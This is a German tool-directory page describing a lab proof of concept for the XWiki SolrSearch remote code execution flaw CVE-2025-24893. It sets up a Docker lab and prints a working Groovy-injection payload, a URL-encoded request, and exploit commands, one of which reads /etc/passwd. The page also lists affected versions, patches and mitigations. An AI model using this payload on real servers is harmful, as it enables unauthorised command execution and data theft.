Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
xwiki-cve-2025-24893 — Exploit für nicht authentifizierte Remote-Codeausführung für XWiki SolrSearch (CVE-2025-24893) über Groovy-Injection im Textparameter, mit Docker-basierter Laborumgebung und PoC-Skript. | Kitploit
Tools/GitHubGitHub/endusdksla/xwiki-cve-2025-24893
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubendusdksla/xwiki-cve-2025-24893

xwiki-cve-2025-24893

Exploit für nicht authentifizierte Remote-Codeausführung für XWiki SolrSearch (CVE-2025-24893) über Groovy-Injection im Textparameter, mit Docker-basierter Laborumgebung und PoC-Skript.

Repository anzeigen
9vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

XWiki SolrSearch Unauthenticated RCE (CVE-2025-24893)


Mitwirkende

  • Whitehat School, 4. Durchgang, 25. Klasse 임두연(@endusdksla)

Zusammenfassung

  • XWiki interpretiert und rendert Wiki-Syntax und Makros serverseitig. Das Problem ist, dass die Main.SolrSearch-Seite Gästen offen steht und der Benutzereingabeparameter text ohne ausreichende Validierung als XWiki-Syntax ausgewertet wird.
  • Ein Angreifer kann in text das {{groovy}}-Makro einfügen, um beliebigen Groovy-Code auf dem Server auszuführen, und über "command".execute() sogar Betriebssystembefehle aufrufen. Diese Schwachstelle kann ohne separates Login oder Token mit einer einzigen GET-Anfrage ausgenutzt werden.

Umgebungskonfiguration

Dieses Verzeichnis verwendet die offizielle XWiki-Standalone-Distribution 15.10.1 und die Java-17-Laufzeitumgebung, um eine verwundbare Umgebung zu erstellen.

ElementBeschreibung
CVECVE-2025-24893
ProduktXWiki Platform
Verwundbare Versionen>= 5.3-milestone-2, < 15.10.11 / >= 16.0.0-rc-1, < 16.4.1
Patch-Versionen15.10.11, 16.4.1
SchwachstellentypEval Injection -> Unauthenticated RCE
Authentifizierung erforderlichNein
AuswirkungAusführung von Serverbefehlen möglich

Schwachstellenbedingungen

  • Die XWiki-Version muss vor dem Patch liegen.
  • Der Main.SolrSearch-Endpunkt muss für Gäste zugänglich sein.
  • Der Server muss den text-Parameter als XWiki-Syntax auswerten können.
  • Das groovy-Makro muss ausführbar sein.

Diese Umgebung verwendet XWiki 15.10.1 und erfüllt daher die obigen Bedingungen.

Reproduktionsschritte

root@kitploit:~
docker compose up -d --build

Beim ersten Start erfolgt eine automatische Installation, die einige Minuten dauern kann (ca. 6–7 Minuten).

root@kitploit:~
docker compose ps
docker inspect -f '{{json .State.Health}}' xwiki-web

Wenn das Ergebnis der obigen Befehle "Status":"healthy" anzeigt, ist die Umgebungskonfiguration abgeschlossen und ausnutzbar.

root@kitploit:~
pip install requests

Installieren Sie die Abhängigkeiten vor dem Ausführen von exploit.py.

PoC-Code

Der Kern-Payload lautet wie folgt:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("id".execute().text){{/groovy}}{{/async}}

Der obige Payload wird in den text-Parameter eingefügt und auf der Main.SolrSearch-Seite ausgewertet. Dadurch wird println("id".execute().text) auf dem Server ausgeführt, und das Ergebnis der Befehlsausführung wird im RSS-Antworttext reflektiert.

Das vollständige Ausführungsskript finden Sie unter exploit.py.

root@kitploit:~
python3 exploit.py

Durch Ausführen des obigen Python-Codes kann der PoC reproduziert werden. Der Standardbefehl ist id.

root@kitploit:~
python3 exploit.py -c "cat /etc/passwd"

Um einen anderen Befehl auszuführen, übergeben Sie die Argumente wie oben.

Oder senden Sie eine Anfrage an die URL (Payload, der id ausgibt):

root@kitploit:~
http://localhost:1337/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22id%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

Ausführungsergebnisse

poc_id Darstellung des Sendens von id als Antwort

poc_ls Auflistung der Dateien im aktuellen Verzeichnis

Gegenmaßnahmen

  • Aktualisieren Sie XWiki auf 15.10.11 oder höher bzw. 16.4.1 oder höher.
  • Überprüfen Sie die Gastzugriffsrichtlinien für nach außen exponierte XWiki-Instanzen.
  • Minimieren Sie die Ausführungsberechtigungen für unnötige Skripte/Makros.
  • Überwachen Sie verdächtige Anfragen und Zugriffsprotokolle auf SolrSearch.

Referenzen

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • GitHub Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
Tool herunterladen